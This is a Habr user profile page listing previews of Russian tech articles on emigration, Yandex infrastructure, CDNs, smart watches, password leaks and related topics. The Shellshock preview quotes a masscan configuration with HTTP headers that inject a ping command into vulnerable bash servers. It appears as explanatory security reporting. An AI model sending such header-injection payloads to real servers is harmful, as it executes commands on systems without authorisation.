Pull to refresh
14
0
Yury Vidineev @Ad3pt

OPS

Send message

В погоне за любимым делом или как я оказался в Бельгии

Reading time6 min
Views37K
У каждого из нас есть свои мечты, цели, увлечения (и есть работа). Иногда все эти вещи совпадают, иногда сосуществуют, и иногда и вовсе расходятся. Мне очень повезло и, по сути, я смог объединить их и найти работу своей мечты, которая прекрасно сочетала в себе мечты и увлечения.

Этот пост навеян двумя сегодняшними хабрастатьями, а именно «Как я уехал работать айтишником в Лондон» и «Про любовь к языкам программирования», ведь именно любовь к языку программирования, в сочетании с двумя моими главными увлечениями, забросили меня в неофициальную столицу Евросоюза.
Узнать, что за язык, и почему именно Бельгия.
Total votes 88: ↑83 and ↓5+78
Comments26

Logbroker: сбор и поставка больших объемов данных в Яндексе

Reading time11 min
Views54K
Привет! Меня зовут Алексей Озерицкий. В Яндексе я работаю в разработке технологий и инфраструктуры. Не только тем нашим сервисам, которыми пользуются миллионы людей, важно уметь работать с действительно большими объемами данных без сбоев. Один из наших ключевых внутренних инструментов — Я.Статистика, информация в котором предназначена только для сотрудников Яндекса и более того — является коммерческой тайной. Статистика занимается сбором, хранением и обработкой информации (в первую очередь логов) от сервисов Яндекса. Результатом нашей работы с ней являются статистические расчеты для дальнейшей аналитики и принятия продуктовых решений.

Один из ключевых компонентов Статистики – Logbroker, распределенное многодатацентровое решение по сбору и поставке данных. Ключевые особенности системы – возможность переживать отключение дата-центра, поддержка семантики exactly once на доставку сообщений и поддержка потоков реального времени (секунды задержки от возникновения события на источнике до получения на приемнике).

В ядре системы лежит Apache Kafka. Logbroker с помощью API изолирует пользователя от сырых потоков Apache Kafka, реализует процессы восстановления после сбоев (в том числе семантику exactly once) и сервисные процессы (междатацентровая репликация, раздача данных на кластеры расчета: YT, YaMR...).
Читать дальше →
Total votes 61: ↑56 and ↓5+51
Comments20

Сюрпризы chef-a или история одного расследования

Reading time6 min
Views13K
imageНе так давно мы в компании Acronis перешли на провиженинг части наших виртуальных машин на Chef. Ничего особенно нового: все виртуальные машины создаются посредством ESXI, а центральный chef-server раздает им свои рецепты, тем самым автоматически поднимая на них окружение, исходя из их ролей. Такая система работала без проблем и сбоев довольно долго. Она освободила нас от большого количества ручной работы, постоянного контроля за окружением машин и необходимостью помнить какое ПО и настройки на них стоят, ведь достаточно открыть веб-консоль chef-server-а, выбрать нужную нам ноду и увидеть все ее роли и настройки.

Все было отлично до тех пор, пока нам не поставили задачу перенести один сайт с внешнего хостинга к нам на сервера, что в итоге привело к охоте на баги и расследованиям в стиле Скуби Ду.

Если заинтересовались, добро пожаловать под кат.
Читать дальше →
Total votes 58: ↑53 and ↓5+48
Comments5

Памяти Алексея Яковлевича Червоненкиса

Reading time2 min
Views74K
Этот текст памяти Алексея Яковлевича написал Аркадий Волож, сооснователь и генеральный директор Яндекса.

22 сентября трагически погиб Алексей Яковлевич Червоненкис — ведущий сотрудник Института проблем управления РАН, профессор МФТИ и Лондонского университета, преподаватель Школы анализа данных, человек, который внёс огромный вклад в теорию машинного обучения.



У науки об обучении машин до сих пор было три периода: докомпьютерный, компьютерный и современный период больших данных.

Первой великой работой Червоненкиса и Вапника была вот эта статья, вышедшая в 1971 году. Теория сходимости частот к их вероятностям определила развитие этой части науки на несколько десятков лет вперед.

Это был период «теоретического» развития машинного обучения. Тогда считать можно было только на каких-нибудь М-200 или, в хорошем случае, на БЭСМ-ах, поэтому о «широком применении в народном хозяйстве» речи не шло. Но различать цели в воздухе, например, или выискивать шумы на эхо-кардиограммах это уже помогало.

Потом наступил второй этап науки об обучении машин, компьютерный. В 1990-е люди научились, например, довольно хорошо распознавать и оцифровывать тексты (в том числе рукописные) или очищать почту от спама. Половина из этих методов работала на знаменитом SVM (Support Vector Machine, метод опорных векторов), придуманном в начале 1990-х Червоненкисом и Вапником (VC-Dimension = Vapnik-Chervonenkis dimension). В середине 2000-х в любой известной конторе работали на SVM-е — и у нас, и в Яху, и в Гугле, и в Амазоне, и в Нетфликсе. SVM описан в любом учебнике по нашей теме.
Читать дальше →
Total votes 202: ↑189 and ↓13+176
Comments24

По городам и весям или как мы балансируем между узлами CDN

Reading time9 min
Views25K
Когда вы выросли настолько, что появились узлы в разных городах, возникает задача распределения нагрузки между ними. Задачи такой балансировки могут быть разными, но цель, как правило, одна: сделать так, чтобы было хорошо. У меня дошли руки рассказать о том, как это делают обычно, и как это сделано в ivi.ru.

В предыдущей статье я рассказал, что CDN у нас свой, при этом тщательно избегал подробностей. Пришла пора поделиться. Рассказ будет в стиле поиска решения, каким он мог бы быть.
Читать дальше →
Total votes 44: ↑42 and ↓2+40
Comments41

Всё, что вы хотели знать об уязвимости Shellshock (но боялись спросить)

Reading time9 min
Views133K
Помните Heartbleed? Shellshock можно отнести к той же «весовой категории», с таким же стильным названием, хоть и без классного логотипа (кому-то из департамента маркетинга этой уязвимости надо бы этим заняться). Но у Shellshock есть потенциал стать не менее важной птицей, чем Heartbleed. И сейчас я хотел бы собрать воедино всю необходимую информацию, которая поможет всем желающим справиться с ситуацией и избежать возможных проблем из-за неочевидной, на первый взгляд, угрозы.

Для начала позвольте поделиться с вами некоторой информацией из блога Роберта Грэма, который провёл превосходный анализ уязвимости. Рассмотрим представленный ниже HTTP-запрос:

target = 0.0.0.0/0
port = 80
banners = true
http-user-agent = shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)
http-header = Cookie:() { :; }; ping -c 3 209.126.230.74
http-header = Host:() { :; }; ping -c 3 209.126.230.74
http-header = Referer:() { :; }; ping -c 3 209.126.230.74

Если его применить к диапазону уязвимых IP, то получим такой результат:



Проще говоря, Роберт заставил кучу удалённых машин пинговать его, просто отправив в сеть специально сформированный запрос. Беспокойство вызывает тот факт, что он заставил эти машины выполнить произвольную команду (в данном случае безобидный ping), что открывает широчайшие возможности.
Читать дальше →
Total votes 106: ↑96 and ↓10+86
Comments93

Ремейк Caesar III: математическая модель города

Reading time6 min
Views67K
Я помню как играл первый раз в Цезарь 3, это удивительно умная и сбалансированная игра, создает чувство, что город живет своей жизнью и после завершения миссии. Можно провести часы, наблюдая за городом и не вмешиваться в его жизнь: плебеи будут бегать по городу в поисках работы, а патриции жаловаться на неважные условия жизни, торговцы, школьники, лодки, жрецы — этот мир замирает лишь в минуты пауз, давая игроку возможность продумать следующий шаг. Исследуя внутренние алгоритмы игры, я не перестаю удивляться с какой точностью авторы сложили кусочки мозаики, под названием «баланс». За время, проведенное над восстановлением кода оригинальной игры скопилось достаточно материала по макромеханике игры, которым я хочу поделиться с хабрасообществом.


Plebs are needed!
Total votes 142: ↑141 and ↓1+140
Comments78

Как компания D-Link предоставляет исходные коды прошивок

Reading time3 min
Views42K
Приветствую хабрчане!

У меня на работе есть несколько стареньких маршрутизаторов D-Link DI-524UP H/W Ver.: A1, выпускавшихся в 2005-2006 годах и доставшихся мне по наследству от прошлого админа. Понятно, что эти устройства отслужили свое, устарели как морально, так и физически и давно лежат на полке, но меня подкупило то, что у этой модели есть USB порт, и в основу прошивки положена операционная система Linux.
Читать дальше →
Total votes 80: ↑74 and ↓6+68
Comments43

Кто есть кто: Умные часы

Reading time28 min
Views146K
Этот год определенно стал годом носимых устройств, в том числе и «умных часов». Такое ощущение, что количество умных часов растет в геометрической прогрессии. Мы насчитали уже больше 50 часов (и это за исключением фитнес-трекеров, которые умеют показывать время) которые уже продаются или будут продаваться в ближайшее время.



Но все ли часы одинаково полезны? Чем они отличаются? Сейчас расскажем.
Под катом исследование рынка умных часов
Total votes 117: ↑106 and ↓11+95
Comments124

Python-digest #35. Новости, интересные проекты, статьи и интервью [27 июля 2014 — 03 августа 2014]

Reading time4 min
Views14K

Дайджест был опубликован ранее, но определенным причинам был исключен с хабра, сейчас же было принято решение вернуть его обратно.
Очередной выпуск новостей из мира Python.
За иллюстрацию к посту, как и раньше, благодарим owlman75, а так же alrusdi за идею дайджестов и за то, что я по прежнему могу публиковать эти дайджесты для вас.
В этом выпуске у нас вот такие интересные новости собрались: свеженькие уязвимости в django, в релизах второй релиз кандидат Django 1.7, APScheduler 3.0, Pylint 1.3 / Astroid 1.2, django-extensions 1.3.9, boto 2.32.0 и еще много интересных библиотек и статей для изучения.
Перейти к дайджесту
Total votes 39: ↑37 and ↓2+35
Comments19

А теперь и gmail.com: в сеть выложена база на 5 000 000 адресов

Reading time2 min
Views465K
Популярному почтовому сервису от Google не удалось избежать повторения ситуации с выкладыванием довольно внушительных баз с логинами и паролями, которая недавно случилась с Yandex и Mail.ru. В сети появилась база с адресами ящиков и паролями на 4929090 аккаунтов gmail.com. Актуальность базы не проверена, но сообщается о более чем 60% валидных пар почта: пароль.

В комментариях к предыдущим записям пользователи резонно замечали, что торговля подобными базами далеко не новость, и чего мол тут шум подняли. С этим трудно не согласиться, но опять же, по комментариям видно, что многие пользователи находили в этих базах свои аккаунты, зачастую с актуальными паролями, после чего меняли пароли и начинали более внимательно относиться к безопасности своих почтовых ящиков. Поэтому считаю не лишним осветить появление и этой базы в свободном доступе в сети.
Читать дальше →
Total votes 163: ↑149 and ↓14+135
Comments396

1000000 паролей от почтовых ящиков Яндекса утекли в сеть

Reading time1 min
Views567K
Сегодня на одном довольно широко известном ресурсе разместили базу email адресов с паролями от почтовых ящиков «Яндекса». База представляет собой текстовый документ, в котором заявлено 1 млн позиций.

С удивлением обнаружил там один из своих, и хотя пароль не был космической сложности, уж точно не для брута и словарей.

Когда именно, и по какой причине данная база утекла в сеть, остается неизвестным. В комментариях народ пишет, что из первых попавшихся 10 яшиков как минимум 8 являются на настоящий момент валидными.

В общем, дружно меняем пароли, пока представители «Яндекса» ищут крота.
Total votes 320: ↑277 and ↓43+234
Comments548

Ввоз средств шифрования в Россию: разоблачая мифы

Reading time14 min
Views108K
Помните недавнюю историю с иском к россиянину, заказавшему в зарубежном Интернет-магазине новый смартфон Motorola? Тогда было немало заметок на эту тему и почти все они могли бы быть сформулированы коротко: “Российские власти закручивают гайки и обычному россиянину уже даже через Интернет нельзя заказать ничего нужного — везде фискалы и правоохранительные органы вставляют палки в колеса”. Надо заметить, что такие высказывания типичны для почти любого человека, который столкнувшись с нестандартной для себя ситуацией, в которой происходит якобы ущемление прав, начинает, не разобравшись, винить во всем всех кроме себя. С ввозом смартфона ситуация была как раз из этой области. Однако случай этот был далеко не первый. Еще несколько лет назад один из россиян, купив на eBay маршрутизатор Cisco, столкнулся с аналогичной ситуацией на российской таможне. А до и после было и еще несколько аналогичных случаев. Попробуем разобраться.
Читать дальше →
Total votes 77: ↑52 and ↓25+27
Comments82

Смартфон под Firefox OS поступил в продажу за $33 (в Индии)

Reading time1 min
Views26K
Mozilla с гордостью объявила о начале продаж смартфона Cloud FX, работающего под операционной системой Firefox OS. Смартфон производства Intex Technologies доступен для покупателей эксклюзивно через сайт Snapdeal.com по цене 1999 рупий (33 доллара США).


Читать дальше →
Total votes 45: ↑39 and ↓6+33
Comments20

Что ждать от нового Samsung Galaxy Note 4

Reading time4 min
Views9K
Привет, Хабр!

В сентябре на IFA 2014 Samsung представит преемника Note III, новый смартфон с 5,75 дюймовым Quad HD дисплеем, традиционной для этой линейки S-Pen и передовой начинкой. Подробнее о подтвержденных данных и о слухах, а также об истории линейки с 2011 года — в этом посте.

image

Экскурс в историю


Об этой компании в рамках Истории брендов я уже писал тут: История Samsung Electronics: От сушеной рыбы до высоких технологий. А сейчас предлагаю посмотреть, как смартфоны Galaxy Note менялись с течением времени.
Читать дальше →
Total votes 24: ↑20 and ↓4+16
Comments8

Клуб $40,000 и бизнес, построенный на продаже open-source железа

Reading time5 min
Views102K
Это не перевод, это топик по материалам новости.

Я уже писал пост про этих ребят из Колорадо. Сегодня они опубликовали новость. Новость, скорее, нерадостную, но, я думаю, когда по осени посчитают цыплят, окажется, что она все-таки позитивная. Дело в том, что они достаточно крупно облажались…
Читать дальше →
Total votes 119: ↑114 and ↓5+109
Comments32

3D-мультфильм с нуля

Reading time5 min
Views101K
Здравствуй, дорогой Хабр

Впервые собрался написать тебе, ведь есть что рассказать и, наконец, появилось немного времени. Лейтмотивом сегодня будет такая тема, как обучение 3D-анимации.
Точка невозврата скрылась за спиной года три назад. Тогда небольшая группа мечтателей, пять лет в режиме хобби занимавшихся мультипликацией, приняла решение сделать из этого свою профессию. Это сейчас нам уже почти три года, и добрая дюжина человек производит 3D-анимацию: детские сериалы и рекламу для компьютерных игр. А тогда, мало понимая, как делаются мультфильмы, собралось шесть человек.
То, что мы никогда до этого не делали 3D-анимацию, и то, что от первоначального состава никого сейчас не осталось — это история отдельная. А сегодняшняя — о том, как, практически с нуля была создана в Казани анимационная студия, полностью работающая на свободном программном обеспечении.
Читать дальше →
Total votes 69: ↑67 and ↓2+65
Comments24

Муниципалитет Мюнхена избавится от Linux на рабочих станциях

Reading time3 min
Views88K
Потребовалось целых 10 лет на то, чтобы в Мюнхене (Германия) задумались о том, как бы избавиться от Linux на рабочих станциях. В 2004 году городской совет решил, что будет дешевле и надежнее перевести 15000 компьютеров на Linux, отказавшись от Windows и других продуктов Microsoft. Как сообщает «Южногерманская газета» Suddeutsche.de (крупнейшая ежедневная газета Германии), из-за бесчисленных нареканий пользователей город планирует заключить контракт с независимой экспертной группой для разработки плана по избавлению от технически отстающего и нефункционального программного обеспечения.
Читать дальше →
Total votes 235: ↑167 and ↓68+99
Comments250

Работа по контракту в Лондоне

Reading time11 min
Views95K

Вид на City, сердце деловой Великобритании

Перед тем как перейти «на контракт» я работал в постоянным сотрудником в Лондоне в небольшой (700 серверов / 8 коллег) компании. Моя специализация — Wintel engineer, то есть я могу работать к в суппорте так и в техподдержке проектов. Все что связано с продуктами Microsoft. Я подумывал об уходе с постоянной работы, однако волею судеб пришлось уйти совершенно неподготовленным. Именно отсюда начинается мой рассказ о контрактниках в Великобритании.
Читать дальше →
Total votes 79: ↑73 and ↓6+67
Comments42

Распределённые вычисления: немного теории

Reading time9 min
Views57K
Девять лет назад я начал «в свободное от основной работы время» преподавать компьютерные дисциплины в одном из университетов Санкт-Петербурга. И только сравнительно недавно к своему удивлению обнаружил, что в наших вузах практически отсутствуют курсы с фокусом на проблематику распределённых вычислений. И даже на Хабре эта тема не раскрыта в достаточной мере! Надо прямо сейчас исправлять ситуацию.

Этой теме я и хотел посвятить статью или даже серию статей. Но потом решил выложить своё учебное пособие по основам распределённых вычислений, вышедшее в свет в этом году (читай, небольшую книгу объемом 155 страниц). В итоге получился гибрид – статья со ссылкой на книгу. Книга распространяется бесплатно и доступна в электронном виде.

Вместо пролога. Приступив к тексту статьи, я в очередной раз задумался, а зачем программисту нужно знать теоретические основы распределённых вычислений. Этот вопрос я неоднократно слышал (и продолжаю слышать) от студентов и специалистов, уже работающих в области ИТ. Действительно, зачем, например, знать, что «множество событий распределённого вычисления упорядочено частично, а не линейно»? В чем, так сказать, каждодневная практическая польза этого фундаментального знания?

Должен признать, что у меня нет готового заученного ответа, который я могу выдать не задумываясь. Поэтому каждый раз приходится напрягаться извилинами, и каждый раз ответы и аргументы получаются разными. Вот и сейчас всё как впервые…
Читать дальше →
Total votes 52: ↑48 and ↓4+44
Comments37

Information

Rating
Does not participate
Location
Россия
Registered
Activity